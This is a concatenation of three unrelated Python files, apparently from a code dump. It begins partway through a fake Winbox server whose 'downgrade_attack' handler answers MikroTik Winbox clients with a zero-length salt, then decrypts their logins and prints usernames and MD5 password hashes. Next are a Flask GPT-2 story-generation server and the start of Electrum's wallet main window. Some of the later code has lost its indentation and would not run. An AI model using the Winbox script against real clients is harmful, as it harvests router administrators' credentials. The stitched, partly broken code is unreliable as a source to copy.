    shared_prime = int("B7BA220582B41518F8526BFE0F624DE926106DFB4F719DD93BC4309D49045A4175DB1C58C4D7843D16E766226894B31793B13E789FFD2CF3331267476031B30D2F995237F0B59A33A4F972FB1A618556EF8F332E7A3C366B24FDB39B42B0670B1F90A3D2E8C22E78DDA51A16B46A8E693BB9AED29E8509361BD438E76B1C235FCDD11E70A2B8C0EA15A9DFEA03278F39C12520A0BC36F21694546154C82E065B2EFFD7DDEBD5C1E588F9916F87D80E91303C9435A20E91DD1C9360DEF6A2B0D54FDA44049C0E8CC8A8049CBB1432C6E322D603F41DAA60028C40D78A8653F659C4FFC3F5D8A4E01A5C08E4B04B52388E9EF4A5E24569D15F", 16)
    shared_base = 5
    server_public = pow(shared_base, local_secret, shared_prime)
    print('\t%x' % server_public)
    print('[+] Sending server\'s public component to client.')
    sock.sendall(b'\xf8' + b'\x05' + server_public.to_bytes(0xf8, byteorder='big'))
    print('[+] Computing session key:')
    shared_secret = pow(client_public, local_secret, shared_prime)
    print('\t%x' % shared_secret)
    # Split the 0xf8-byte secret into two 0x7c-byte half keys: the high
    # half keys the client->server stream, the low half server->client.
    mega_key = shared_secret.to_bytes(0xf8, byteorder='big')
    send_key = mega_key[0x7c:]
    recv_key = mega_key[:0x7c]
    print('[+] Seeding RC4 engines')
    crypto_out = RC4(send_key)
    crypto_in = RC4(recv_key)
    print('[+] Waiting for salt request')
    message_length = sock.recv(1)
    handler = sock.recv(1)
    if (handler[0] != 5):
        print('[-] Client sent unexpected handler: %x' % handler[0])
        sock.close()
        return
    if (message_length[0] != 0x38):
        print('[-] Client request is an unexpected length: %x' % message_length[0])
        sock.close()
        return
    print('[+] Received salt request')
    encrypted_salt_request = sock.recv(message_length[0])
    # Wire layout: bytes [2:12] are the RC4 padding, the rest is payload.
    payload = encrypted_salt_request[12:]
    padding = encrypted_salt_request[2:12]
    print('[+] Decrypting the request')
    indata = crypto_in.send_block_crypt(payload, padding, True);
    print('[+] Sending salt response')
    # Our response actually provides a 0 length salt. Which the client seems
    # to happily accept.
    padding = b'\x00'*10
    salt_response = (b'M2\x01\x00\xff\x88\x02\x00\x00\x00\x00\x00' +
        b'\x0b\x00\x00\x00\x02\x00\xff\x88\x02\x00\x0d\x00\x00\x00\x04' +
        b'\x00\x00\x00\x03\x00\xff\x09\x02\x06\x00\xff\x09\x02\x09\x00' +
        b'\x00\x31\x00')
    outdata = crypto_out.send_block_crypt(salt_response, padding);
    sock.sendall(b'\x39' + b'\x05' + b'\x00' + b'\x2d' + outdata)
    print('[+] Waiting for a login request')
    message_length = sock.recv(1)
    handler = sock.recv(1)
    if (handler[0] != 5):
        print('[-] Client sent unexpected handler: %x' % handler[0])
        sock.close()
        return
    print('[+] Received a login request')
    encrypted_salt_request = sock.recv(message_length[0])
    payload = encrypted_salt_request[12:]
    padding = encrypted_salt_request[2:12]
    print('[+] Decrypting the request')
    indata = crypto_in.send_block_crypt(payload, padding, True);
    print('[+] Extracting username and hashed password:')
    # this logic isn't perfect since we aren't actually parsing the M2 message.
    # 01 00 00 21 tags the username; 0a 00 00 31 11 00 tags the MD5 hash.
    username_offset = indata.find(b'\x01\x00\x00\x21')
    hash_offset = indata.find(b'\x0a\x00\x00\x31\x11\x00')
    username_end = username_offset + 5 + indata[username_offset + 4]
    username = indata[username_offset + 5:username_end].decode('utf-8')
    print('\t%s' % username)
    hash_end = hash_offset + 5 + 1 + 16
    md5hash = indata[hash_offset + 6:hash_end]
    print('\t', end='')
    for i in md5hash:
        print('{:02x}'.format(i), end='')
    print('')
    sock.close()
    return
if __name__ == '__main__':
    # bind to 8291 on all interfaces (8291 is Winbox's default port)
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind(('0.0.0.0', 8291))
    server.listen(5)
    print('[+] Listening on 0.0.0.0:8291')
    # Handle each connecting Winbox client on its own thread so several
    # clients can be served concurrently.
    while True:
        client_sock, address = server.accept()
        print('[+] Accepted connection from %s:%s' % (address[0], address[1]))
        client_handler = threading.Thread(target=downgrade_attack, args=(client_sock,))
        client_handler.start()
|
server.py | import numpy as np
import os
import io
# import for server
from flask import Flask, render_template, request, Response, send_file, jsonify
from queue import Queue, Empty
import threading
import time
# import for model
from transformers import AutoTokenizer, AutoModelWithLMHead, top_k_top_p_filtering
from torch.nn import functional as F
import torch
import time
# flask server
app = Flask(__name__)
# limit input file size under 2MB
# NOTE(review): the comment above appears stale -- no size limit (e.g.
# app.config['MAX_CONTENT_LENGTH']) is actually configured here; confirm.
# model loading: GPT-2 genre story generator from the HuggingFace hub
tokenizer = AutoTokenizer.from_pretrained("pranavpsv/gpt2-genre-story-generator")
model = AutoModelWithLMHead.from_pretrained("pranavpsv/gpt2-genre-story-generator", return_dict=True)
# change cpu to gpu so that model can use gpu (because default type is cpu)
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
model.to(device)
# request queue setting: HTTP handlers enqueue jobs, a single background
# thread (handle_requests_by_batch) dequeues and runs the model
requests_queue = Queue()
BATCH_SIZE = 1  # max jobs processed per batch
CHECK_INTERVAL = 0.1  # seconds between queue/output polls
# static variable
# request handling
def handle_requests_by_batch():
    """Worker loop: drain the request queue and attach model output.

    Runs forever on a background thread. Collects up to BATCH_SIZE queued
    jobs, dispatches each to run_short (2 args) or run_long (3 args), and
    stores the result under job['output'] -- the HTTP handler polls for that
    key. Every dequeued job is guaranteed to receive an 'output' (500 on any
    failure) so waiting HTTP threads are never left polling forever, and a
    single bad job can no longer kill this dispatcher thread (the original
    wrapped the whole infinite loop in one try block).
    """
    while True:
        requests_batch = []
        # Block in short timeouts so up to BATCH_SIZE jobs can be grouped.
        while not (len(requests_batch) >= BATCH_SIZE):
            try:
                requests_batch.append(requests_queue.get(timeout=CHECK_INTERVAL))
            except Empty:
                continue
        # "job" avoids shadowing flask's module-level "request" import.
        for job in requests_batch:
            try:
                args = job["input"]
                if len(args) == 2:
                    job["output"] = run_short(args[0], args[1])
                elif len(args) == 3:
                    job["output"] = run_long(args[0], args[1], args[2])
                else:
                    job["output"] = 500
            except Exception as e:
                print(e)
                # Mark the job failed so its HTTP thread can return an error.
                job["output"] = 500
# request processing: start the single dispatcher thread at import time
# NOTE(review): this is a non-daemon thread, so it will keep the process
# alive after the WSGI server exits -- consider daemon=True.
threading.Thread(target=handle_requests_by_batch).start()
# run short model
def run_short(prompt, num):
    """Sample `num` candidate next tokens for `prompt`.

    Returns a dict mapping sample index -> decoded token string, or the
    sentinel 500 on any failure (the route handler checks for it).
    """
    try:
        cleaned = prompt.strip()
        # Tokenize and move to the same device as the model.
        ids = tokenizer.encode(cleaned, return_tensors='pt').to(device)
        # Logits for the position following the prompt.
        last_logits = model(ids).logits[:, -1, :]
        # Restrict to the top-k candidates, then sample from the softmax.
        filtered = top_k_top_p_filtering(last_logits, top_k=50, top_p=1.0)
        distribution = F.softmax(filtered, dim=-1)
        sampled = torch.multinomial(distribution, num_samples=num)
        return {idx: tokenizer.decode(tok)
                for idx, tok in enumerate(sampled.tolist()[0])}
    except Exception as e:
        print(e)
        return 500
# run long model
def run_long(prompt, num, length):
    """Generate `num` continuations of `length` new tokens for `prompt`.

    Returns a dict mapping sequence index -> decoded continuation (the
    prompt tokens are sliced off), or the sentinel 500 on any failure.
    """
    try:
        cleaned = prompt.strip()
        # Tokenize and move to the same device as the model.
        ids = tokenizer.encode(cleaned, return_tensors='pt').to(device)
        prompt_len = len(ids.tolist()[0])
        # Force exactly `length` generated tokens beyond the prompt.
        target_len = length + prompt_len
        outputs = model.generate(ids, pad_token_id=50256,
                                 do_sample=True,
                                 max_length=target_len,
                                 min_length=target_len,
                                 top_k=40,
                                 num_return_sequences=num)
        return {i: tokenizer.decode(seq.tolist()[prompt_len:],
                                    skip_special_tokens=True)
                for i, seq in enumerate(outputs)}
    except Exception as e:
        print(e)
        return 500
# routing
@app.route("/gpt2-story/<types>", methods=['POST'])
def generation(types):
try:
if types != 'short' and types != 'long':
return jsonify({'message' : 'Error! Can not route short or long'}), 400
# only get one request at a time
if requests_queue.qsize() > BATCH_SIZE:
return jsonify({'message' : 'TooManyReqeusts'}), 429
# check image format
try:
args = []
prompt = str(request.form['text'])
num = int(str(request.form['num_samples']))
args.append(prompt)
args.append(num)
if types == 'long':
length = int(str(request.form['length']))
args.append(length)
except Exception:
return jsonify({'message' : 'Error! Can not read args from request'}), 500
# put data to request_queue
req = {'input' : args}
requests_queue.put(req)
# wait output
while 'output' not in req:
time.sleep(CHECK_INTERVAL)
# send output
generated_text = req['output']
if generated_text == 500:
return jsonify({'message': 'Error! An unknown error occurred on the server'}), 500
result = jsonify(generated_text)
return result
except Exception as e:
print(e)
return jsonify({'message': 'Error! Unable to process request'}), 400
@app.route('/healthz')
def health():
    """Liveness probe endpoint; always returns HTTP 200."""
    return "ok", 200
@app.route('/')
def main():
    """Root endpoint; returns HTTP 200 so load balancers see the app as up."""
    return "ok", 200
if __name__ == "__main__":
from waitress import serve
serve(app, host='0.0.0.0', port=80) |
main_window.py | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import webbrowser
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QSpinBox, QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit, QTreeWidgetItem,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QMenu, QSizePolicy, QStatusBar)
import electrum
from electrum import (keystore, simple_config, ecc, constants, util, bitcoin, commands,
coinchooser, paymentrequest)
from electrum.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum.plugin import run_hook
from electrum.i18n import _
from electrum.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, NotEnoughFunds,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword,
base_units, base_units_list, base_unit_name_to_decimal_point,
decimal_point_to_base_unit_name, quantize_feerate,
UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter)
from electrum.transaction import Transaction, TxOutput
from electrum.address_synchronizer import AddTransactionException
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption)
from electrum.version import ELECTRUM_VERSION
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, FromList, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton, expiration_values,
ButtonsLineEdit, CopyCloseButton, import_meta_gui, export_meta_gui,
filename_field, address_field)
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
class StatusBarButton(QPushButton):
    """Flat, fixed-width icon button used in the status bar.

    Wraps *func* so it runs both on mouse click and on the Return key,
    discarding the 'checked' argument PyQt5 passes to click handlers.
    """

    def __init__(self, icon, tooltip, func):
        QPushButton.__init__(self, icon, '')
        self.func = func
        # cosmetic setup: flat look, small fixed size, hand cursor
        self.setToolTip(tooltip)
        self.setFlat(True)
        self.setMaximumWidth(25)
        self.setIconSize(QSize(25, 25))
        self.setCursor(QCursor(Qt.PointingHandCursor))
        self.clicked.connect(self.onPress)

    def onPress(self, checked=False):
        '''Drops the unwanted PyQt5 "checked" argument'''
        self.func()

    def keyPressEvent(self, e):
        # make the button keyboard-activatable via Return
        if e.key() == Qt.Key_Return:
            self.func()
from electrum.paymentrequest import PR_PAID
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
    def __init__(self, gui_object, wallet: Abstract_Wallet):
        """Build the main wallet window.

        Sets up window state, tabs, menus, shortcuts, network callbacks and
        (optionally) the update-check thread.

        gui_object: the application-level GUI object (owns daemon, tray,
                    Qt app, config and the shared timer).
        wallet:     the wallet displayed by this window; must not be None.
        """
        QMainWindow.__init__(self)
        # --- references to app-wide objects ---
        self.gui_object = gui_object
        self.config = config = gui_object.config  # type: SimpleConfig
        self.gui_thread = gui_object.gui_thread
        self.setup_exception_hook()
        self.network = gui_object.daemon.network  # type: Network
        assert wallet, "no wallet"
        self.wallet = wallet
        self.fx = gui_object.daemon.fx  # type: FxThread
        self.invoices = wallet.invoices
        self.contacts = wallet.contacts
        self.tray = gui_object.tray
        self.app = gui_object.app
        # --- per-window mutable state ---
        self.cleaned_up = False
        self.payment_request = None
        self.checking_accounts = False
        self.qr_window = None
        self.not_enough_funds = False
        self.pluginsdialog = None
        self.require_fee_update = False
        self.tl_windows = []
        self.tx_external_keypairs = {}
        Logger.__init__(self)
        # queue of incoming txs, drained periodically by notify_transactions
        self.tx_notification_queue = queue.Queue()
        self.tx_notification_last_time = 0
        self.create_status_bar()
        self.need_update = threading.Event()
        # base-unit settings; fall back to default if the stored value is invalid
        self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT)
        try:
            decimal_point_to_base_unit_name(self.decimal_point)
        except UnknownBaseUnit:
            self.decimal_point = DECIMAL_POINT_DEFAULT
        self.num_zeros = int(config.get('num_zeros', 0))
        self.completions = QStringListModel()
        # --- tabs ---
        self.tabs = tabs = QTabWidget(self)
        self.send_tab = self.create_send_tab()
        self.receive_tab = self.create_receive_tab()
        self.addresses_tab = self.create_addresses_tab()
        self.utxo_tab = self.create_utxo_tab()
        self.console_tab = self.create_console_tab()
        self.contacts_tab = self.create_contacts_tab()
        tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
        tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
        tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
        def add_optional_tab(tabs, tab, icon, description, name):
            # record metadata used by toggle_tab to insert the tab back in order
            tab.tab_icon = icon
            tab.tab_description = description
            tab.tab_pos = len(tabs)
            tab.tab_name = name
            if self.config.get('show_{}_tab'.format(name), False):
                tabs.addTab(tab, icon, description.replace("&", ""))
        add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
        add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
        add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
        add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
        tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
        self.setCentralWidget(tabs)
        if self.config.get("is_maximized"):
            self.showMaximized()
        self.setWindowIcon(read_QIcon("electrum.png"))
        self.init_menubar()
        # --- keyboard shortcuts; weakref so lambdas don't keep tabs alive ---
        wrtabs = weakref.proxy(tabs)
        QShortcut(QKeySequence("Ctrl+W"), self, self.close)
        QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
        QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
        QShortcut(QKeySequence("F5"), self, self.update_wallet)
        QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
        QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
        for i in range(wrtabs.count()):
            # i=i default binds the current value (avoids late-binding closure bug)
            QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
        self.payment_request_ok_signal.connect(self.payment_request_ok)
        self.payment_request_error_signal.connect(self.payment_request_error)
        self.history_list.setFocus(True)
        # network callbacks
        if self.network:
            self.network_signal.connect(self.on_network_qt)
            interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
                         'new_transaction', 'status',
                         'banner', 'verified', 'fee', 'fee_histogram']
            # To avoid leaking references to "self" that prevent the
            # window from being GC-ed when closed, callbacks should be
            # methods of this class only, and specifically not be
            # partials, lambdas or methods of subobjects.  Hence...
            self.network.register_callback(self.on_network, interests)
            # set initial message
            self.console.showMessage(self.network.banner)
            self.network.register_callback(self.on_quotes, ['on_quotes'])
            self.network.register_callback(self.on_history, ['on_history'])
            self.new_fx_quotes_signal.connect(self.on_fx_quotes)
            self.new_fx_history_signal.connect(self.on_fx_history)
        # update fee slider in case we missed the callback
        self.fee_slider.update()
        self.load_wallet(wallet)
        gui_object.timer.timeout.connect(self.timer_actions)
        self.fetch_alias()
        # If the option hasn't been set yet
        if config.get('check_updates') is None:
            choice = QMessageBox.question(self,
                                          "Electrum - " + _("Enable update check"),
                                          _("For security reasons we advise that you always use the latest version of Electrum.") + " " +
                                          _("Would you like to be notified when there is a newer version of Electrum available?"),
                                          QMessageBox.Yes,
                                          QMessageBox.No)
            config.set_key('check_updates', choice == QMessageBox.Yes, save=True)
        if config.get('check_updates', False):
            # The references to both the thread and the window need to be stored somewhere
            # to prevent GC from getting in our way.
            def on_version_received(v):
                if UpdateCheck.is_newer(v):
                    self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
                    self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
                    self.update_check_button.show()
            self._update_check_thread = UpdateCheckThread(self)
            self._update_check_thread.checked.connect(on_version_received)
            self._update_check_thread.start()
    def on_history(self, b):
        """Network-thread callback for 'on_history': invalidate the fiat
        price cache, then hand off to the GUI thread via signal."""
        self.wallet.clear_coin_price_cache()
        self.new_fx_history_signal.emit()
    def setup_exception_hook(self):
        """Install the crash-reporter exception hook for this window."""
        Exception_Hook(self)
    def on_fx_history(self):
        """GUI-thread handler for new fiat history data: refresh views."""
        self.history_model.refresh('fx_history')
        self.address_list.update()
    def on_quotes(self, b):
        """Network-thread callback for 'on_quotes': relay to GUI thread."""
        self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
    def toggle_tab(self, tab):
        """Show or hide an optional tab, persist the choice, and keep the
        tab inserted at its original relative position (tab.tab_pos)."""
        show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
        self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
        item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
        tab.menu_action.setText(item_text)
        if show:
            # Find out where to place the tab
            index = len(self.tabs)
            for i in range(len(self.tabs)):
                try:
                    if tab.tab_pos < self.tabs.widget(i).tab_pos:
                        index = i
                        break
                except AttributeError:
                    # non-optional tabs (History/Send/Receive) have no tab_pos; skip them
                    pass
            self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
        else:
            i = self.tabs.indexOf(tab)
            self.tabs.removeTab(i)
    def push_top_level_window(self, window):
        '''Used for e.g. tx dialog box to ensure new dialogs are appropriately
        parented.  This used to be done by explicitly providing the parent
        window, but that isn't something hardware wallet prompts know.'''
        self.tl_windows.append(window)
    def pop_top_level_window(self, window):
        """Remove *window* from the top-level-window stack (see push_top_level_window)."""
        self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
    def diagnostic_name(self):
        """Name used in log lines for this window (delegates to the wallet)."""
        #return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
        return self.wallet.diagnostic_name()
    def is_hidden(self):
        """Return True when the window is minimized or not shown."""
        return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
    def bring_to_top(self):
        """Show the window and raise it above other windows."""
        self.show()
        self.raise_()
    def on_error(self, exc_info):
        """TaskThread error handler: show user-facing errors, log the rest.

        exc_info: a (type, value, traceback) triple as returned by sys.exc_info().
        """
        e = exc_info[1]
        if isinstance(e, UserCancelled):
            # user aborted on purpose; nothing to report
            pass
        elif isinstance(e, UserFacingException):
            self.show_error(str(e))
        else:
            try:
                self.logger.error("on_error", exc_info=exc_info)
            except OSError:
                pass  # see #4418
            self.show_error(str(e))
    def on_network(self, event, *args):
        """Network-thread callback dispatcher.

        Runs OUTSIDE the GUI thread: must only set flags, enqueue work, or
        emit signals; GUI work is done later in on_network_qt/timer_actions.
        """
        if event == 'wallet_updated':
            wallet = args[0]
            if wallet == self.wallet:
                self.need_update.set()
        elif event == 'network_updated':
            self.gui_object.network_updated_signal_obj.network_updated_signal \
                .emit(event, args)
            self.network_signal.emit('status', None)
        elif event == 'blockchain_updated':
            # to update number of confirmations in history
            self.need_update.set()
        elif event == 'new_transaction':
            wallet, tx = args
            if wallet == self.wallet:
                # queued for notify_transactions (rate-limited, GUI thread)
                self.tx_notification_queue.put(tx)
        elif event in ['status', 'banner', 'verified', 'fee', 'fee_histogram']:
            # Handle in GUI thread
            self.network_signal.emit(event, args)
        else:
            self.logger.info(f"unexpected network message: {event} {args}")
    def on_network_qt(self, event, args=None):
        # Handle a network message in the GUI thread
        if event == 'status':
            self.update_status()
        elif event == 'banner':
            self.console.showMessage(args[0])
        elif event == 'verified':
            wallet, tx_hash, tx_mined_status = args
            if wallet == self.wallet:
                self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
        elif event == 'fee':
            if self.config.is_dynfee():
                self.fee_slider.update()
                # recompute the current tx fee on the next timer tick
                self.require_fee_update = True
        elif event == 'fee_histogram':
            if self.config.is_dynfee():
                self.fee_slider.update()
                self.require_fee_update = True
            self.history_model.on_fee_histogram()
        else:
            self.logger.info(f"unexpected network_qt signal: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
    def close_wallet(self):
        """Notify plugins that this window's wallet is being closed."""
        if self.wallet:
            self.logger.info(f'close_wallet {self.wallet.storage.path}')
        run_hook('close_wallet', self.wallet)
    @profiler
    def load_wallet(self, wallet):
        """Wire *wallet* into this window: start its task thread, refresh
        menus/tabs, restore geometry, show the window, run plugin hooks,
        and surface any detected internal-address corruption."""
        wallet.thread = TaskThread(self, self.on_error)
        self.update_recently_visited(wallet.storage.path)
        self.need_update.set()
        # Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
        # update menus
        self.seed_menu.setEnabled(self.wallet.has_seed())
        self.update_lock_icon()
        self.update_buttons_on_seed()
        self.update_console()
        self.clear_receive_tab()
        self.request_list.update()
        self.tabs.show()
        self.init_geometry()
        if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
            # start hidden in the tray if configured and the tray is available
            self.hide()
        else:
            self.show()
        self.watching_only_changed()
        run_hook('load_wallet', wallet, self)
        try:
            wallet.try_detecting_internal_addresses_corruption()
        except InternalAddressCorruption as e:
            self.show_error(str(e))
            send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum Testnet" if constants.net.TESTNET else "Electrum"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
    def warn_if_watching_only(self):
        """Pop a warning dialog if the wallet cannot spend (watching-only)."""
        if self.wallet.is_watching_only():
            msg = ' '.join([
                _("This wallet is watching-only."),
                _("This means you will not be able to spend Bitcoins with it."),
                _("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
            ])
            self.show_warning(msg, title=_('Watch-only wallet'))
    def warn_if_testnet(self):
        """Warn (once per process, unless opted out) that testnet coins are
        worthless; a checkbox lets the user suppress the warning forever."""
        if not constants.net.TESTNET:
            return
        # user might have opted out already
        if self.config.get('dont_show_testnet_warning', False):
            return
        # only show once per process lifecycle
        if getattr(self.gui_object, '_warned_testnet', False):
            return
        self.gui_object._warned_testnet = True
        msg = ''.join([
            _("You are in testnet mode."), ' ',
            _("Testnet coins are worthless."), '\n',
            _("Testnet is separate from the main Bitcoin network. It is used for testing.")
        ])
        cb = QCheckBox(_("Don't show this again."))
        cb_checked = False
        def on_cb(x):
            # captures the checkbox state; read after the dialog closes
            nonlocal cb_checked
            cb_checked = x == Qt.Checked
        cb.stateChanged.connect(on_cb)
        self.show_warning(msg, title=_('Testnet'), checkbox=cb)
        if cb_checked:
            self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
    def backup_wallet(self):
        """Ask for a destination and copy the wallet file there, reporting
        success or failure in a dialog."""
        path = self.wallet.storage.path
        wallet_folder = os.path.dirname(path)
        filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
        if not filename:
            return
        new_path = os.path.join(wallet_folder, filename)
        if new_path != path:
            try:
                # copy2 preserves metadata (timestamps, permissions)
                shutil.copy2(path, new_path)
                self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
            except BaseException as reason:
                # deliberately broad: any failure here should only produce a dialog
                self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
    def get_wallet_folder(self):
        """Return the absolute directory containing the current wallet file."""
        return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
    def init_menubar(self):
        """Build the File/Wallet/View/Tools/Help menu bar.

        Stores several QAction/QMenu handles on self (password_menu,
        seed_menu, import/export menus, recently_visited_menu, ...) so other
        methods can enable/disable them as wallet capabilities change.
        """
        menubar = QMenuBar()
        # --- File ---
        file_menu = menubar.addMenu(_("&File"))
        self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
        file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
